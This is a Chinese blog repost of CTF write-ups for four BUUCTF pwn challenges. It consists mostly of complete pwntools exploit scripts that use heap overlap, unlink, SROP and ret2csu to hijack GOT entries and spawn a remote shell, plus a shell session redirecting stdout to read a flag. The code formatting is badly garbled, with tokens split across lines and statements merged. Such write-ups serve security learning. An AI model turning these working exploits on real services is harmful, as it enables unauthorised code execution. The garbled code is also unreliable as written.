生活随笔
收集整理的這篇文章主要介紹了
PWN-PRACTICE-BUUCTF-17
小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.
PWN-PRACTICE-BUUCTF-17
- hitcontraining_heapcreator
- wustctf2020_closed
- ciscn_2019_es_7
- hitcon2014_stkof
hitcontraining_heapcreator
單字節(jié)溢出,修改下一個chunk的size,造成chunk overlap,實現(xiàn)任意地址讀寫
參考:buuctf hitcontraining_heapcreator HITCON Trainging lab13
from pwn
import *
io
=remote
("node4.buuoj.cn",25331)
elf
=ELF
("./heapcreator")
libc
=ELF
("./libc-2.23-16-x64.so")def create(size
,content
):io
.sendlineafter
("Your choice :","1")io
.sendlineafter
("Size of Heap : ",str(size
))io
.sendlineafter
("Content of heap:",content
)
def edit(index
,content
):io
.sendlineafter
("Your choice :","2")io
.sendlineafter
("Index :",str(index
))io
.sendlineafter
("Content of heap : ",content
)
def show(index
):io
.sendlineafter
("Your choice :","3")io
.sendlineafter
("Index :",str(index
))
def delete(index
):io
.sendlineafter
("Your choice :","4")io
.sendlineafter
("Index :",str(index
))
def exit():io
.sendlineafter
("Your choice :","5")heaparray
=0x00000000006020A0
create
(0x18,"aaaa")
create
(0x10,"bbbb")
create
(0x10,"cccc")
create
(0x10,"/bin/sh\x00")edit
(0,"a"*0x18+"\x81")
delete
(1)size
="\x08".ljust
(8,"\x00")
payload
="d"*0x40+size
+p64
(elf
.got
["free"])
create
(0x70,payload
)show
(2)
io
.recvuntil
("Content : ")
free_addr
=u64
(io
.recvuntil
("\n")[:-1].ljust
(8,"\x00"))
print("free_addr:"+hex(free_addr
))
libc_base
=free_addr
-libc
.sym
["free"]
system
=libc_base
+libc
.sym
["system"]
edit
(2,p64
(system
))
delete
(3)io
.interactive
()
wustctf2020_closed
題目所給的elf文件關(guān)閉了標(biāo)準(zhǔn)輸出(fd=1)和標(biāo)準(zhǔn)錯誤(fd=2)
利用重定向?qū)?biāo)準(zhǔn)輸出重定向到標(biāo)準(zhǔn)輸入(fd=0)
p1umh0@p1umh0:~/ctf/pwn$
nc node4.buuoj.cn
25787__ ___ ______ ___ /
|/ /__ /_ __/__
< /_ __/ /
|_/ / _ `// / / __/ /
\ \ /
/_/ /_/
\_,_//_/ /_/ /_//_
\_
\ HaHaHa
!
What
else can you do???
exec 1>&0
cat flag
flag
{b02e836b-f53a-4c9a-8287-b54b93c7c65f
}
^C
ciscn_2019_es_7
棧溢出,SROP或者ret2csu均可
SROP exp:
from pwn
import *
context
.arch
='amd64'
context
.os
='linux'
io
=remote
("node4.buuoj.cn",29577)
elf
=ELF
('./ciscn_2019_es_7')
rax_0xf
=0x4004DA
syscall
=0x400517
vuln_addr
=0x4004ED
payload
='a'*0x10+p64
(vuln_addr
)
io
.send
(payload
)
io
.recv
(0x20)
stack_addr
=u64
(io
.recv
(6).ljust
(8,'\x00'))
print(stack_addr
)
binsh_addr
=stack_addr
-0x118
sigframe
= SigreturnFrame
()
sigframe
.rax
= constants
.SYS_execve
sigframe
.rdi
= binsh_addr
sigframe
.rsi
= 0x0
sigframe
.rdx
= 0x0
sigframe
.rsp
= stack_addr
sigframe
.rip
= syscall
payload
='/bin/sh\x00'
payload
=payload
.ljust
(0x10,'a')
payload
+=p64
(rax_0xf
)+p64
(syscall
)+str(sigframe
)
io
.send
(payload
)
io
.interactive
()
ret2csu exp:
from pwn
import *
io
=remote
("node4.buuoj.cn",29577)
execve_addr
=0x4004E2
syscall
= 0x400517
part1
=0x40059A
part2
=0x400580
pop_rdi_ret
= 0x00000000004005a3
vuln_addr
=0x4004ED
payload
='a'*0x10+p64
(vuln_addr
)
io
.sendline
(payload
)
io
.recv
(0x20)
stack
=u64
(io
.recv
(8))
binsh_addr
=stack
-0x118
execve_stack
=stack
-0x110
payload
='/bin/sh\x00'+p64
(execve_addr
)
def com_gadget(part1
, part2
, jmp2
, arg1
= 0x0, arg2
= 0x0, arg3
= 0x0):payload
= p64
(part1
) payload
+= p64
(0x0) payload
+= p64
(0x1) payload
+= p64
(jmp2
) payload
+= p64
(arg3
) payload
+= p64
(arg2
) payload
+= p64
(arg1
) payload
+= p64
(part2
) payload
+= 'A' * 56 return payload
payload
+=com_gadget
(part1
,part2
,execve_stack
,0,0,0)
payload
+=p64
(pop_rdi_ret
)+p64
(binsh_addr
)+p64
(syscall
)
io
.sendline
(payload
)
io
.interactive
()
hitcon2014_stkof
利用small bin 的 unlink實現(xiàn)任意地址讀寫,參考:前端 Unlink筆記&2014 HITCON stkof題解
from pwn
import *
io
=remote
("node4.buuoj.cn",29090)
elf
=ELF
("./stkof")
libc
=ELF
("./libc-2.23-16-x64.so")
free_got
=elf
.got
["free"]
puts_got
=elf
.got
["puts"]
puts_plt
=elf
.plt
["puts"]
atoi_got
=elf
.got
["atoi"]def create(size
):io
.sendline
("1")io
.sendline
(str(size
))io
.recvuntil
("OK\n")
def fill(index
,size
,content
):io
.sendline
("2")io
.sendline
(str(index
))io
.sendline
(str(size
))io
.send
(content
)
def free(index
):io
.sendline
("3")io
.sendline
(str(index
))
def show(index
):io
.sendline
("4")io
.sendline
(str(index
))io
.recvuntil
("OK\n")
s
=0x0000000000602140
create
(0x100)
create
(0x30)
create
(0x80)
FD
=s
+16-0x18
BK
=s
+16-0x10
payload
=p64
(0)+p64
(0x30)+p64
(FD
)+p64
(BK
)
payload
=payload
.ljust
(0x30,"A")
payload
+=p64
(0x30)+p64
(0x90)
fill
(2,len(payload
),payload
)free
(3)payload
="a"*0x10+p64
(free_got
)+p64
(puts_got
)+p64
(atoi_got
)
fill
(2,len(payload
),payload
)
fill
(1,len(p64
(puts_plt
)),p64
(puts_plt
))free
(2)
puts_addr
=u64
(io
.recvuntil
("\x7f")[-6:].ljust
(8,"\x00"))
print(hex(puts_addr
))
libc_base
=puts_addr
-libc
.sym
["puts"]
system
=libc_base
+libc
.sym
["system"]
fill
(3,len(p64
(system
)),p64
(system
))
io
.sendline
("/bin/sh\x00")
io
.interactive
()
總結(jié)
以上是生活随笔為你收集整理的PWN-PRACTICE-BUUCTF-17的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。
